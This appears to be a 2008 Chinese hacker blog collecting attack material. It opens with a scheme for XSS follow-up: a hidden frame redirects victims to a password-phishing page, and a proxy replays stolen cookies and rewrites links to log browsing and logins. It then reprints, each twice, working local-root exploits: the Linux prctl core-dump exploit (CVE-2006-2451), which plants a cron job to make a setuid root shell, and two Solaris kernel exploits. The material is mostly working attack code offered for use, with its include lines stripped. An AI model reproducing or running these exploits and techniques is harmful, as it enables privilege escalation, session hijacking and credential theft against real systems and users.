技术收藏
2008/04/02 
00:42 
5
816
2008 年 Xss 蠕虫也许会和 cookie 注入一样成为黑客入侵的最前沿。
世面上流行的 xss 入侵无非是下面的几种方法
这里我摘用Monyer 写的文章 大家可以具体去看看
http://www.hacker57.cn/article.asp?id=346
当我们跨站成功后 可以指定跳转我们的页面,如果这是个框架页面比如 index.htm
包括了两个页面 1 和 页面 2 (页面 2 是隐藏的)通过写在 页面2 里 简单的 js 程序 我们可以控制页面 1里面的 地址转向
页面 1 先调用 用户正常访问的 页面 ,2分钟后 (通过页面2 的控制 跳转到指定的 密码输入钓鱼页面)
步骤1 跳转载入 index.htm
步骤 2通过页面 2 内 JS 可以 控制 延迟4000 毫秒后 页面1 自动跳转(指跳转一次)4分钟后 用户页面自动跳转
你还可以使用 java 读取 框架内 页面1 内的数据 并定时记录。==============================================
当然很多网站限制了 框架结构 会自动跳出这就需要利用另一个技术 HttpClient来模拟浏览器GET POSTXss
跳转 并传递cookie获取cookie 后 利用 http client 技术 模拟用户访问
他当前的页面获得用户正常访问的 页面代码同时替换所有 url
比如 把 src=http://www.qq.com/file/admin.asp
替换成 src=http://xxx.com/demo.jsp? url=http://www.qq.com/file/admin.asp
print 输出
这时用户看到的是和原来页面一样的东西但是他这个时候的页面内的所有连接已经被我们替换,意味着他点击的连接会先连向我们的Demo.jsp 然后我们的 demo 会再此模拟他的cookie 去访问这些连接
Print 输出
也许你问这样做的意义是什么?
它可以记录用户从xss跳转后所有的 访问页面 和登陆信息
| 引用(0)
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer
/* - RoMaNSoFt
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
| 引用(0)
/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
| 引用(0)
老东西 随便记录一下
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call */
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
| 引用(0)
